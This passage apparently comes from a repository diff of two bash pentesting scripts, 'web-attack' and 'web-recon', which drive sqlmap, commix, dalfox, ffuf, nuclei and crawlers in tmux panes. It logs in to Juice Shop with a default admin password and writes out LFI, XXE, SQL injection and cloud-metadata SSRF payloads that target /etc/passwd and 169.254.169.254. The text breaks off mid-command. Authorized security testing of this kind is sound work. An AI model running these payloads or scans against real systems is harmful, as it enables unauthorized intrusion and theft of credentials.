|
|
||||||
|
echo -e "${CYAN}[*]${NC} Detected Juice Shop - attempting authentication..."
|
||||||
|
|
||||||
|
# Login and extract JWT token
|
||||||
|
local response=$(curl -s -X POST "${url}/rest/user/login" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
-d '{"email":"admin@juice-sh.op","password":"admin123"}' 2>/dev/null)
|
||||||
|
|
||||||
|
if [[ -z "$response" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Could not connect to Juice Shop login endpoint"
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Extract token from response
|
||||||
|
AUTH_TOKEN=$(echo "$response" | jq -r '.authentication.token' 2>/dev/null)
|
||||||
|
|
||||||
|
if [[ -n "$AUTH_TOKEN" ]] && [[ "$AUTH_TOKEN" != "null" ]]; then
|
||||||
|
echo -e "${GREEN}✓${NC} Successfully authenticated as admin@juice-sh.op"
|
||||||
|
echo -e "${CYAN}[*]${NC} JWT token obtained (will be used by all tools)"
|
||||||
|
return 0
|
||||||
|
else
|
||||||
|
echo -e "${YELLOW}⚠${NC} Authentication failed - continuing without auth"
|
||||||
|
AUTH_TOKEN=""
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main web-attack function
|
||||||
|
run_web_attack() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Ensure URL has http:// or https://
|
||||||
|
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||||
|
url="http://$url"
|
||||||
|
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${RED}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ ⚠️ ACTIVE EXPLOITATION TESTING ⚠️ ║"
|
||||||
|
echo "║ Target: $url"
|
||||||
|
echo "║ AUTHORIZATION REQUIRED - LEGAL USE ONLY ║"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Authorization check
|
||||||
|
check_authorization "$url"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$url"
|
||||||
|
|
||||||
|
# Attempt Juice Shop authentication
|
||||||
|
export AUTH_TOKEN=""
|
||||||
|
get_juice_shop_auth "$url"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||||
|
run_attacks_sequential "$url"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window with 6 panes
|
||||||
|
tmux new-window -n "--> ATTACK: ${url:0:15}... <--"
|
||||||
|
|
||||||
|
# Create 3x2 grid (6 panes total)
|
||||||
|
# CRITICAL: Tmux renumbers panes during splits, pane 0 disappears
|
||||||
|
# Strategy: Create 3 columns first, then split each vertically
|
||||||
|
# Final layout:
|
||||||
|
# [1: sqlmap] [3: dalfox] [5: nuclei]
|
||||||
|
# [2: commix] [4: ffuf] [6: manual]
|
||||||
|
|
||||||
|
# Create 3 columns (horizontal splits)
|
||||||
|
tmux split-window -h
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Select leftmost pane and split vertically (creates bottom-left)
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Select middle pane and split vertically (creates bottom-middle)
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Select rightmost pane and split vertically (creates bottom-right)
|
||||||
|
tmux select-pane -t 4
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Note: tmux 'tiled' layout may choose 2x3 or 3x2 depending on terminal size
|
||||||
|
# Current result: 2 columns x 3 rows (vertical orientation)
|
||||||
|
# Both layouts work fine - tmux optimizes based on available space
|
||||||
|
tmux select-layout tiled
|
||||||
|
|
||||||
|
# Final pane numbering after tiled layout:
|
||||||
|
# If 2x3 (2 columns, 3 rows): If 3x2 (3 columns, 2 rows):
|
||||||
|
# 1 4 1 3 5
|
||||||
|
# 2 5 2 4 6
|
||||||
|
# 3 6
|
||||||
|
|
||||||
|
# Pane 1 (top-left): SQLMap (SQL injection)
|
||||||
|
tmux select-pane -t 1
|
||||||
|
if command -v sqlmap &>/dev/null; then
|
||||||
|
# Use recon URLs if available, otherwise deep crawl
|
||||||
|
# Rate-limited: 1 thread, 2 second delay to prevent target crash
|
||||||
|
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||||
|
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||||
|
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||||
|
local url_count=$(wc -l < "$RECON_URLS")
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||||
|
local url_count=$(wc -l < "$RECON_URLS")
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ sqlmap not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 2 (bottom-left): Commix (command injection)
|
||||||
|
tmux select-pane -t 2
|
||||||
|
if command -v commix &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Commix: Command injection testing...${NC}' && timeout 120 commix -u '$url' --batch --crawl=2 --output-dir=commix 2>&1 | tee commix.log || echo 'Commix timeout or no vulns' && echo -e '${GREEN}✓ Commix complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ commix not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 3 (top-middle): Dalfox (XSS detection)
|
||||||
|
tmux select-pane -t 3
|
||||||
|
if command -v dalfox &>/dev/null; then
|
||||||
|
# Use recon URLs if available for better XSS detection
|
||||||
|
# Rate-limited: 200ms delay between requests (balanced speed/safety)
|
||||||
|
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||||
|
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||||
|
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||||
|
local url_count=$(wc -l < "$RECON_URLS")
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||||
|
local url_count=$(wc -l < "$RECON_URLS")
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ dalfox not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 4 (bottom-middle): FFUF (parameter fuzzing)
|
||||||
|
tmux select-pane -t 4
|
||||||
|
if command -v ffuf &>/dev/null; then
|
||||||
|
# Check if payload script exists
|
||||||
|
if command -v payload &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} FFUF: Parameter fuzzing with payloads...${NC}' && payload sqli basic > sqli.txt && payload xss basic > xss.txt && echo 'admin' > users.txt && echo 'password' >> users.txt && ffuf -u '$url?id=FUZZ' -w sqli.txt -mc 200,500 -o ffuf-sqli.json 2>&1 | head -50 && echo -e '${GREEN}✓ FFUF complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ payload script not found - basic ffuf only${NC}' && echo \"' OR '1'='1\" > payloads.txt && ffuf -u '$url?id=FUZZ' -w payloads.txt -mc 200,500 2>&1 | head -50" C-m
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ ffuf not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 5 (top-right): Nuclei (exploit templates only)
|
||||||
|
tmux select-pane -t 5
|
||||||
|
if command -v nuclei &>/dev/null; then
|
||||||
|
# Rate-limited: 10 requests/second, stagger start by 6 seconds
|
||||||
|
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||||
|
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates (authenticated)...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -H 'Authorization: Bearer \$AUTH_TOKEN' -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 6 (bottom-right): Manual LFI/XXE/SSRF testing
|
||||||
|
tmux select-pane -t 6
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Manual vulnerability testing...${NC}' && echo 'Testing LFI/XXE/SSRF vectors...' && echo '# LFI Tests' > manual-tests.txt && echo '$url?file=../../../../etc/passwd' >> manual-tests.txt && echo '$url?page=....//....//etc/passwd' >> manual-tests.txt && echo '# XXE Test' >> manual-tests.txt && echo '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>' >> manual-tests.txt && echo '# SSRF Test' >> manual-tests.txt && echo '$url?url=http://169.254.169.254/latest/meta-data/' >> manual-tests.txt && cat manual-tests.txt && echo -e '${CYAN}[*] Manual tests prepared. Review and execute as needed.${NC}'" C-m
|
||||||
|
|
||||||
|
# Focus back on sqlmap pane
|
||||||
|
tmux select-pane -t 1
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✓${NC} Tmux web-attack window created"
|
||||||
|
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> ATTACK: ${url:0:15}... <--${NC}"
|
||||||
|
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
echo
|
||||||
|
echo -e "${YELLOW}Rate Limiting:${NC} Tools staggered and rate-limited to prevent target crash"
|
||||||
|
echo -e "${YELLOW}Target Safety:${NC} 500ms-1s delays, reduced threads, max 10 req/sec"
|
||||||
|
echo -e "${YELLOW}Note:${NC} Review results carefully - automated tools have false positives"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
run_attacks_sequential() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
cd "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running SQLMap...${NC}"
|
||||||
|
command -v sqlmap &>/dev/null && sqlmap -u "$url" --batch --crawl=2 --level=2 --risk=2 -o --output-dir=sqlmap || echo "sqlmap not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running Dalfox...${NC}"
|
||||||
|
command -v dalfox &>/dev/null && dalfox url "$url" --deep-domxss -o dalfox.txt || echo "dalfox not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running Nuclei exploits...${NC}"
|
||||||
|
command -v nuclei &>/dev/null && nuclei -u "$url" -s critical,high -o nuclei-exploits.txt || echo "nuclei not installed"
|
||||||
|
|
||||||
|
echo -e "\n${GREENSTAR} Running Commix...${NC}"
|
||||||
|
command -v commix &>/dev/null && timeout 120 commix -u "$url" --batch --output-dir=commix || echo "commix not installed or no vulns"
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
|
||||||
|
echo -e "\n${GREEN}✓${NC} Web attack complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
url="$1"
|
||||||
|
|
||||||
|
# Validate URL
|
||||||
|
if [[ -z "$url" ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} URL required"
|
||||||
|
echo "Usage: web-attack <url>"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check tools
|
||||||
|
check_tools
|
||||||
|
|
||||||
|
# Run web attacks
|
||||||
|
run_web_attack "$url"
|
||||||
265
scripts/pentesting/web-recon
Executable file
265
scripts/pentesting/web-recon
Executable file
|
|
@ -0,0 +1,265 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: web-recon.sh
|
||||||
|
# Description: Web application reconnaissance with tmux orchestration
|
||||||
|
# Usage: web-recon <url>
|
||||||
|
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)
|
||||||
|
|
||||||
|
VERSION="2.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Status indicators
|
||||||
|
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||||
|
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||||
|
readonly REDMINUS="${RED}[-]${NC}"
|
||||||
|
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " web-recon <url>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||||
|
echo " Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
|
||||||
|
echo " - Pane 1 (top-left): nuclei (vulnerability scanner)"
|
||||||
|
echo " - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
|
||||||
|
echo " - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
|
||||||
|
echo " - Pane 4 (bottom-right): live results dashboard"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " web-recon http://target.htb"
|
||||||
|
echo " web-recon https://example.com"
|
||||||
|
echo " web-recon 10.10.10.5"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}OUTPUT:${NC}"
|
||||||
|
echo " All results saved to: ./web-recon-<target>-<timestamp>/"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}WORKFLOW:${NC}"
|
||||||
|
echo " - Nuclei & Katana: Run in parallel immediately"
|
||||||
|
echo " - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
|
||||||
|
echo " - httpx: Live monitoring - probes URLs as they're discovered"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Check required tools
|
||||||
|
check_tools() {
|
||||||
|
local missing=()
|
||||||
|
local optional_missing=()
|
||||||
|
|
||||||
|
# Core tools
|
||||||
|
command -v tmux &>/dev/null || missing+=("tmux")
|
||||||
|
|
||||||
|
# Web tools (all optional but warn)
|
||||||
|
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||||
|
command -v feroxbuster &>/dev/null || optional_missing+=("feroxbuster")
|
||||||
|
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||||
|
command -v arjun &>/dev/null || optional_missing+=("arjun")
|
||||||
|
|
||||||
|
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||||
|
echo -e "${CYAN}Install with:${NC}"
|
||||||
|
for tool in "${optional_missing[@]}"; do
|
||||||
|
case "$tool" in
|
||||||
|
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||||
|
feroxbuster) echo " cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
|
||||||
|
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||||
|
arjun) echo " pipx install arjun" ;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir() {
|
||||||
|
local url="$1"
|
||||||
|
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||||
|
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||||
|
|
||||||
|
OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
|
||||||
|
mkdir -p "$OUTPUT_DIR"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main web-recon function
|
||||||
|
run_web_recon() {
|
||||||
|
local url="$1"
|
||||||
|
|
||||||
|
# Ensure URL has http:// or https://
|
||||||
|
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||||
|
url="http://$url"
|
||||||
|
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${CYAN}${BOLD}"
|
||||||
|
echo "╔════════════════════════════════════════════════════════════╗"
|
||||||
|
echo "║ Web Application Reconnaissance ║"
|
||||||
|
echo "║ Target: $url"
|
||||||
|
echo "╚════════════════════════════════════════════════════════════╝"
|
||||||
|
echo -e "${NC}"
|
||||||
|
|
||||||
|
# Create output directory
|
||||||
|
setup_output_dir "$url"
|
||||||
|
|
||||||
|
# Check if in tmux
|
||||||
|
if [[ -z "${TMUX:-}" ]]; then
|
||||||
|
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||||
|
run_scans_sequential "$url"
|
||||||
|
return
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Create tmux window
|
||||||
|
WINDOW_NAME="--> Web: ${url:0:20}... <--"
|
||||||
|
tmux new-window -n "$WINDOW_NAME"
|
||||||
|
|
||||||
|
# Split into 4 panes with explicit targeting
|
||||||
|
# Layout: 2x2 grid with pipelines and live monitoring
|
||||||
|
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||||
|
# [1: nuclei] [2: feroxbuster → arjun]
|
||||||
|
# [3: katana] [4: live dashboard]
|
||||||
|
|
||||||
|
# Create 2x2 grid layout
|
||||||
|
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||||
|
# Step 1: split-window -h creates [0:left] [1:right]
|
||||||
|
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||||
|
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||||
|
#
|
||||||
|
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||||
|
|
||||||
|
# Split horizontally first (left | right)
|
||||||
|
tmux split-window -h
|
||||||
|
|
||||||
|
# Split left column vertically
|
||||||
|
tmux select-pane -t 0
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Split right column vertically (target pane 2 after left split)
|
||||||
|
tmux select-pane -t 2
|
||||||
|
tmux split-window -v
|
||||||
|
|
||||||
|
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||||
|
tmux select-layout tiled
|
||||||
|
|
||||||
|
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||||
|
# 1 (top-left) 2 (top-right)
|
||||||
|
# 3 (bottom-left) 4 (bottom-right)
|
||||||
|
|
||||||
|
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||||
|
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||||
|
# (pane 0 disappears during the splitting process)
|
||||||
|
|
||||||
|
# Pane 1 (top-left): nuclei
|
||||||
|
tmux select-pane -t 1
|
||||||
|
if command -v nuclei &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
|
||||||
|
tmux select-pane -t 2
|
||||||
|
if command -v feroxbuster &>/dev/null; then
|
||||||
|
# Run feroxbuster, then arjun on discovered URLs
|
||||||
|
if command -v arjun &>/dev/null; then
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||||
|
tmux select-pane -t 3
|
||||||
|
if command -v katana &>/dev/null; then
|
||||||
|
# Full katana with all output formats as originally requested
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||||
|
else
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Pane 4 (bottom-right): Live results dashboard
|
||||||
|
tmux select-pane -t 4
|
||||||
|
# Watch output files and show live statistics
|
||||||
|
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && [ -s feroxbuster.txt ] && echo \" Found: \$(wc -l < feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}Arjun:${NC}'; [ -f arjun_main.txt ] && [ -s arjun_main.txt ] && echo \" Found: \$(wc -l < arjun_main.txt 2>/dev/null || echo 0) parameters\" || [ -f arjun.log ] && grep -q 'complete' arjun.log 2>/dev/null && echo ' Complete (0 parameters)' || echo 